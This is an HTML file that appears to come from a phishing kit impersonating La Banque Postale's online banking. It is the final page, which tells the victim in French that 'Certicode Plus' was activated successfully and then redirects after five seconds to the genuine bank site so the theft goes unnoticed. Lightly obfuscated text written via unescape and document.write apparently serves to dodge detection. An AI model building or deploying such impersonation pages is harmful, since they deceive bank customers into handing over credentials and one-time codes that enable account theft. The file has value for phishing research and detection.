
<!-- saved from url=(0125)#?/fin.php?aspx=&d5a55c71b0b7375925650d6cfc725a1e -->
<html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
    <!-- standard.jsp -->


    <title>Bienvenue - compte bancaire en ligne – La Banque Postale</title>
   <link rel="shortcut icon" href="#?/img/favicon.png">
   
   <meta http-equiv="refresh" content="5; url=https://www.labanquepostale.fr/">


    <link rel="stylesheet" type="text/css" href="./success_files/reset.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/datePicker.css" media="all">

    <link rel="stylesheet" type="text/css" href="./success_files/default.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/static.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/rib.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/blocs.css" media="all">
	
	

	
	
    <link rel="stylesheet" type="text/css" href="./success_files/print.css" media="all">

    <link rel="stylesheet" type="text/css" href="./success_files/bridge.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/fontesLocales.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/main.css" media="all">
    <link rel="stylesheet" type="text/css" href="./success_files/outils.css" media="all">

    <link rel="stylesheet" type="text/css" href="./success_files/correctifs-style.css" media="all">


    <script type="text/javascript" src="./success_files/jquery-1.11.1.min.js.téléchargement"></script>



    <script type="text/javascript" src="./success_files/jquery.placeholder.js.téléchargement"></script>
 



    <script type="text/javascript" src="./success_files/plugin.js.téléchargement"></script>
    <script type="text/javascript" src="./success_files/main.js.téléchargement"></script>

    <!-- SCRIPT permettant de mettre en gris les boutons annuler - Correction impact N6 -->
    <script type="text/javascript">
        $(document).ready(function() {
            $('a.btn_crt:contains("Annuler")').addClass("btn_annuler");
        });
    </script>


    <link rel="stylesheet" href="./success_files/inbenta_OLD.css">
</head>

<body>
    <div id="page">

        <script type="text/javascript" src="./success_files/xiti_profile.js.téléchargement"></script>

        <!-- SCRIPT INBENTA  -->
        <script language="javascript" type="text/javascript" src="./success_files/inbenta-faq.js.téléchargement" defer=""></script>

        <script type="text/javascript" src="./success_files/header.js.téléchargement" defer=""></script>

        <header id="header-main" role="banner">

            <div id="inbenta-contents"></div>
            <div class="header__profile">
                <div class="content" role="banner">
                    <a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" class="logo-wrapper"><img src="./success_files/logo-lbp_header.png" alt="La Banque Postale" class="logo"></a>
                    <div class="nav-profile">
                        <ul>
                            <li class="faq-search">

                                <a>
                                    <img src="./success_files/message.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"> Poser une question ?</a>
                                </li><li class="profile collapse">
                                    <a>
                                        <img src="./success_files/profil.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"> Mon profil
                                        <span class="visually-hidden"><script>m='Dtulrti%20lt%20atnp';d=unescape(m);document.write(d);</script>Dtulrti lt atnp</span>
                                    </a>
                                </li>
                                <br>
                                <a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
                                    <img src="./success_files/deconnexion.png" alt="" aria-hidden="true" role="img" style="width:22px;height:22px"><span style="color: #F0F0F0;"><script>m='Dtcvnntkrvn';d=unescape(m);document.write(d);</script>Dtcvnntkrvn</span>
                                    <i class=""></i>
                            
                        </a></ul><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
                    </a></div><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
                </a></div><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
            </a></div><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">

            </a><div class="alert alert--primary" role="alert"><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
                </a><div class="content"><a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;Gerer&#39;,&#39;N&#39;);">
                    </a><a class="alert__close" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" id="#">
                        <img src="./success_files/x.png" alt="" role="img" aria-hidden="true" style="width:20px;height:20px"></a>

                    
                    <p class="alert__body" style="color: #fff">
                                  - Dernière connexion internet
				   
				   
				   
				   <span id="oDateFr">22/03/2020</span>

</p>

<script>
function twDateLocale(_id,_date,_lang,_long) {
  if(_long) {
    var options = { weekday: 'long', year: 'numeric', month: 'long', day: 'numeric' };
  } else {

  }
  document.getElementById(_id).innerHTML = _date.toLocaleDateString( _lang,options).replace(/\b\w/, function(l){ return l.toUpperCase() });
}
</script>

<script>
  twDateLocale("oDateFr",new Date(),"fr-FR");
</script>			
			
				
                    <p></p>
                </div>
            </div>

            <nav id="menu" class="header__nav" role="navigation">
                <div class="content">
                    <ul>
                        <li>
                            <a id="consulter" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m=&#39;Cvnzpleti&#39;;d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                              Consulter
                            </span>
                            </a>
                        </li>
                        <li>
                            <a id="gerer" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m=&#39;Gtiti&#39;;d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">Gérer</span>
                            </a>
                        </li>
                        <li>

                            <a id="contacter" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;m=&#39;Cvnemceti&#39;;d=unescape(m);document.write(d);&#39;,&#39;N&#39;);">
                                <span class="item">
                                        <div id="echec" class="cache_hub" style="float: left; display: none;">
                                            <img src="./success_files/enveloppe.png" alt="">
                                        </div>
                                        <span>Contacter</span>
                                <span class="badge badge--primary cache_hub" aria-hidden="true" id="nbHUB" style="display: inline-block;"><span id="nbHUBcontent">0</span></span>
                                </span>
                            </a>
                            <script type="text/javascript">
                                addOnloadFunction(prepaGestionHUB);

                                function prepaGestionHUB() {
                                    gestionHUB();
                                }
                            </script>

                        </li>
                        <li>
                            <a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
                                <span class="item" style="color: #004b9b">S'informer &amp; Souscrire</span>
                        </a></li><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
                    </a></ul><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
                </a></div><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
            </a></nav><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
        </a></header><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">


        <div class="ui-grid-row">
        </div>
        </a><div class="formline"><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
            <label class="title-level2" for="cada" id="labelCompteEmetteur">
                <br>
                <div>
                    <div class="content">
                        <ul>
                            <li>
                                <span class="item">
	                        </span>
                                <br>
                                <br>
                            </li>
                            <li>

                                <div class="content">
                                    <ul>
                                        <li>

                                </li></ul></div>
                                <div id="C:F1:D">
                                    <div class="a_blocfctltitre">
                                    </div>
                                    <div id="C:F1:expContent" class="a_blocfctl">
                                        <div id="C:B:D" class="bloctxt info">
                                            <h1 style="text-align:center;"><strong> Votre Certicode Plus à été activé avec succès.</strong><br>
<center><h3> Cordialement La Banque Postale</h3></center>
</h1></div>
                   <br>
 <h1>

		

		</h1></div></div></li></ul>
<input type="hidden" name="otpSecureForm" id="otpSecureForm" value="x0xpQ671TcANv">



<div id="tfi_gestion_beneficiaires_creation_compte_saisie_otp_bas">

</div>

<div id="persobas"></div>
		</div></div>
		</label></a><footer id="main-footer" role="contentinfo"><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">

</a><div class="content"><a id="informersouscrire" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" onclick="return xt_click(this,&#39;C&#39;,&#39;16&#39;,&#39;&#39;,&#39;N&#39;);">
    </a><a id="imageFooter" href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#" class="logo-wrapper">
        <img src="./success_files/logo-lbp_footer.png" class="logo">
    </a>
         <ul>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">A propos de La Banque Postale</a></li>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">Tarifs</a></li>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">Sécurité</a></li>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">Accessibilité</a></li>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">Mentions légales</a></li>
        <li><a href="#?/fin.php?aspx=&amp;d5a55c71b0b7375925650d6cfc725a1e#">Fonds de Garantie des dépôts</a></li>
    </ul>
</div>
		</footer>
	</div>
</div></body></html>